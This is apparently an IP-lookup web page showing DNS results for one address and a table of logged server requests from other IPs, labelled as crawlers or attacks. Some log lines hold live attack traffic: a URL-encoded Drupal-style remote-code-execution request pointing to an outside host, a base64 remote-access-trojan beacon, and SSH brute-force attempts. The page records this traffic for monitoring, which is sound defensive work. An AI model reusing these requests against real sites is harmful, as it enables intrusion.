城市(city): unknown
省份(region): unknown
国家(country): Egypt
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 156.199.91.203
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 57194
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;156.199.91.203. IN A
;; AUTHORITY SECTION:
. 524 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022021202 1800 900 604800 86400
;; Query time: 58 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Feb 13 10:08:50 CST 2022
;; MSG SIZE rcvd: 107
203.91.199.156.in-addr.arpa domain name pointer host-156.199.203.91-static.tedata.net.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
203.91.199.156.in-addr.arpa name = host-156.199.203.91-static.tedata.net.
Authoritative answers can be found from:
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 212.64.27.235 | attack | May 25 01:28:20 dedicated sshd[28058]: Invalid user osmc from 212.64.27.235 port 56391 |
2019-05-25 07:30:15 |
| 104.237.226.44 | spamattack | 104.237.226.44 - - [13/May/2019:10:14:27 +0800] "POST /check-ip/173.213.132.149 HTTP/1.1" 400 142 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.17929)" 104.237.226.44 - - [13/May/2019:10:14:30 +0800] "POST / HTTP/1.1" 400 142 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.17929)" |
2019-05-13 10:19:35 |
| 198.20.87.98 | bots | 198.20.87.98 - - [20/May/2019:11:39:58 +0800] "GET /robots.txt HTTP/1.1" 301 194 "-" "-" 198.20.87.98 - - [20/May/2019:11:39:59 +0800] "GET /sitemap.xml HTTP/1.1" 301 194 "-" "-" 198.20.87.98 - - [20/May/2019:11:40:00 +0800] "GET /.well-known/security.txt HTTP/1.1" 301 194 "-" "-" 198.20.87.98 - - [20/May/2019:11:40:00 +0800] "GET /favicon.ico HTTP/1.1" 301 194 "-" "python-requests/2.10.0" 198.20.87.98 - - [20/May/2019:11:40:01 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "python-requests/2.10.0" |
2019-05-20 11:45:29 |
| 176.8.90.246 | botsattack | 176.8.90.246 - - [07/May/2019:08:33:30 +0800] "GET /seo-joy.cgi HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36" 176.8.90.246 - - [07/May/2019:08:33:31 +0800] "GET /yybbs.cgi HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36" 176.8.90.246 - - [07/May/2019:08:33:32 +0800] "GET /guestbook HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36" 176.8.90.246 - - [07/May/2019:08:33:33 +0800] "GET /aska.cgi HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36" 176.8.90.246 - - [07/May/2019:08:33:35 +0800] "GET /default.asp HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36" 176.8.90.246 - - [07/May/2019:08:33:36 +0800] "GET /album.cgi HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36" 176.8.90.246 - - [07/May/2019:08:33:39 +0800] "GET /guestbook.html HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36" 176.8.90.246 - - [07/May/2019:08:33:41 +0800] "GET /apps/guestbook HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0.3542.0 Safari/537.36" 176.8.90.246 - - [07/May/2019:08:33:42 +0800] "GET /g_book.cgi HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/71.0. |
2019-05-07 08:35:19 |
| 182.254.197.152 | attack | 182.254.197.152 - - [14/May/2019:06:42:16 +0800] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6http://118.25.52.138/ HTTP/1.1" 301 194 "-" "Mozilla/5.0 (W |
2019-05-14 07:15:21 |
| 218.30.103.183 | bots | 搜狗爬虫 |
2019-05-13 11:41:17 |
| 66.240.205.34 | botsattack | 66.240.205.34 - - [07/May/2019:09:30:04 +0800] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 182 "-" "-" |
2019-05-07 09:31:34 |
| 45.233.193.204 | bots | 45.233.193.204 - - [07/May/2019:08:09:34 +0800] "GET / HTTP/1.0" 301 194 "-" "-" |
2019-05-07 08:10:41 |
| 104.238.37.208 | bots | 爬虫 |
2019-05-12 17:48:32 |
| 128.199.59.39 | botsattack | UDP flood attack port:0 port:51331 |
2019-05-06 10:22:08 |
| 195.206.105.32 | attack | 未知参数,有攻击嫌疑 195.206.105.32 - - [21/May/2019:09:29:34 +0800] "GET /check-ip/36.255.87.233&sa=U&ved=0ahUKEwi24qy6vKviAhVKYVAKHX3LDZEQFghvMBM&usg=AOvVaw0pw4L36GM4AN7ztE-QYEby HTTP/1.1" 200 9880 "-" "-" |
2019-05-21 09:32:54 |
| 159.89.201.212 | botsattack | UDP flood port:0 port:53413 |
2019-05-10 13:19:04 |
| 116.255.176.54 | attack | 116.255.176.54 - - [13/May/2019:12:55:54 +0800] "POST //config/AspCms_Config.asp HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//config/AspCms_Config.asp" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-05-13 13:02:53 |
| 178.195.8.238 | bots | 178.195.8.238 - - [07/May/2019:08:08:33 +0800] "GET /check-ip/80.14.181.213 HTTP/1.1" 200 9961 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0" 178.195.8.238 - - [07/May/2019:08:09:13 +0800] "GET /check-ip/80.14.181.213 HTTP/1.1" 200 10461 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090405 Firefox/3.6a1pre" |
2019-05-07 08:10:21 |
| 193.27.242.2 | attack | [portscan] Port scan |
2019-05-25 07:29:47 |